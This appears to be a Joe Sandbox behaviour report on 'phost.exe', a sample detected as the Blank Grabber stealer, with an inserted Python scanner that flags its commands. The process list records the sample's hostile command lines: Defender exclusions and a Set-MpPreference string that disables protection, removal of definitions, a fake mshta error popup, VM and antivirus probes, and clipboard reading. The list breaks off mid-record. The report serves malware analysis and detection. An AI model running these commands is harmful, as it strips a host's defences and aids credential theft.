    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Set-Cookie: __cfruid=d7c98e932c69185b4fd952897188f4a54139cb30-1734075751; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: _cfuvid=E0fT_eR75aZoCbniOOZ.Jl5rOKtvPVKzo2aCeNNnf0A-1734075751127-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 8f14515d1ed40cb2-EWR


Target ID: 0
Start time: 02:41:41
Start date: 13/12/2024
Path: C:\Users\user\Desktop\phost.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\phost.exe"
Imagebase: 0x7ff62cc70000
File size: 7'832'204 bytes
MD5 hash: 8C43BF4445CAC5FA025B9DFD07517B6F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1680237831.000001C32AC85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1680237831.000001C32AC83000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 1
Start time: 02:41:41
Start date: 13/12/2024
Path: C:\Users\user\Desktop\phost.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\phost.exe"
Imagebase: 0x7ff62cc70000
File size: 7'832'204 bytes
MD5 hash: 8C43BF4445CAC5FA025B9DFD07517B6F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1702090319.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2178616618.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2170059092.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2166479596.000001AE1E122000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2173409124.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2175138187.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2176893974.000001AE1D044000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2169952863.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2172415408.000001AE1D7E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2177462355.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 02:41:44
Start date: 13/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'"
Imagebase: 0x7ff6ccf90000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 02:41:44
Start date: 13/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase: 0x7ff6ccf90000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 02:41:44
Start date: 13/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 02:41:44
Start date: 13/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""
Imagebase: 0x7ff6ccf90000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 02:41:44
Start date: 13/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID:7
Start time:02:41:44
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:02:41:44
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:02:41:44
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:02:41:44
Start date:13/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:02:41:44
Start date:13/12/2024
Path:C:\Windows\System32\mshta.exe
Wow64 process (32bit):false
Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
Imagebase:0x7ff6e9de0000
File size:14'848 bytes
MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:12
Start time:02:41:44
Start date:13/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:02:41:44
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff606630000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:02:41:44
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true
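
Added example (not part of the Joe Sandbox report): a small Python scanner that parses process records in the report's Key:value layout and flags the command lines listed for Target IDs 10 through 14, namely the Add-MpPreference exclusion, the Set-MpPreference protection changes, the mshta inline JavaScript popup, the tasklist enumeration and the wmic csproduct uuid query. The embedded records are a constructed excerpt that copies the page's own paths and command lines; the rule names, severities and regular expressions are this example's assumptions, not Joe Sandbox signatures.

```python
"""Added example: parse Joe Sandbox "Key:value" process records and flag the
Defender-tampering and discovery command lines listed in this report."""
import re
from typing import Dict, List, Tuple

# Constructed excerpt of the process list above: same field names and
# command lines as the report, trimmed to the fields the rules need.
SAMPLE_REPORT = r"""Target ID:10
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'
Has elevated privileges:true

Target ID:11
Path:C:\Windows\System32\mshta.exe
Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
Has elevated privileges:true

Target ID:12
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Has elevated privileges:true

Target ID:13
Path:C:\Windows\System32\tasklist.exe
Commandline:tasklist /FO LIST
Has elevated privileges:true

Target ID:14
Path:C:\Windows\System32\cmd.exe
Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Has elevated privileges:true
"""

# (rule name, severity, regex on the image path, regex on the command line).
# Names and severities are this example's own, not Joe Sandbox's. Matching is
# case-insensitive because cmd.exe, wmic and PowerShell parameters are not case-sensitive.
RULES: List[Tuple[str, str, str, str]] = [
    ("defender_exclusion_added", "high", r"powershell\.exe$",
     r"Add-MpPreference\b.*-Exclusion(Path|Extension|Process)\b"),
    ("defender_protection_disabled", "high", r"powershell\.exe$",
     r"Set-MpPreference\b.*(-Disable\w+\s+\$true|-(EnableControlledFolderAccess|MAPSReporting)\s+Disabled)"),
    ("mshta_inline_script", "medium", r"mshta\.exe$",
     r"\bmshta\b.*\b(javascript|vbscript):"),
    ("hardware_uuid_discovery", "medium", r"(cmd|wmic)\.exe$",
     r"\bwmic\b.*\bcsproduct\b.*\buuid\b"),
    # Noisy on its own; kept at low severity so it only adds weight to the others.
    ("process_enumeration", "low", r"(cmd|tasklist)\.exe$", r"\btasklist\b"),
]


def parse_records(text: str) -> List[Dict[str, str]]:
    """Split the report into one dict per process; a blank line ends a record.
    Values contain ':' themselves (times, drive letters, javascript: URIs),
    so only the first colon on a line separates key from value."""
    records: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def scan(text: str) -> List[Tuple[str, str, str]]:
    """Return (target id, rule name, severity) for every record matching a rule.
    Records without a Commandline field are skipped."""
    hits: List[Tuple[str, str, str]] = []
    for rec in parse_records(text):
        image = rec.get("Path", "")
        cmdline = rec.get("Commandline", "")
        if not cmdline:
            continue
        for name, severity, image_re, cmd_re in RULES:
            if re.search(image_re, image, re.I) and re.search(cmd_re, cmdline, re.I):
                hits.append((rec.get("Target ID", "?"), name, severity))
    return hits


if __name__ == "__main__":
    for target, rule, severity in scan(SAMPLE_REPORT):
        print(f"Target {target}: {rule} [{severity}]")
```

Both PowerShell entries ran with elevated privileges, so on a host without Tamper Protection the exclusion and the Set-MpPreference changes would have taken effect; with Tamper Protection on, the Set-MpPreference real-time-protection changes are rejected but the command line is still worth alerting on. The tasklist rule is deliberately low severity: process enumeration alone is routine, and it only matters here because it sits next to the Defender tampering and the wmic uuid query that Joe Sandbox flags as a data-centre check.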

Target ID:15
Start time:02:41:44
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                            Imagebase:0x7ff6c9a10000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                            Start time:02:41:47
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                            Start time:02:41:47
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                            Start time:02:41:48
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                                                                            Imagebase:0x7ff734040000
                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                            Start time:02:41:48
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                            Start time:02:41:48
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                            Start time:02:41:48
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                            Start time:02:41:48
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                                                                            Imagebase:0x7ff734040000
                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                            Start time:02:41:49
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:02:41:49
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:02:41:49
Start date:13/12/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic path win32_VideoController get name
Imagebase:0x7ff6c9a10000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:02:41:51
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:02:41:51
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:02:41:51
Start date:13/12/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic path win32_VideoController get name
Imagebase:0x7ff6c9a10000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:02:41:52
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:02:41:52
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:02:41:52
Start date:13/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:02:41:55
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:02:41:55
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:02:41:55
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
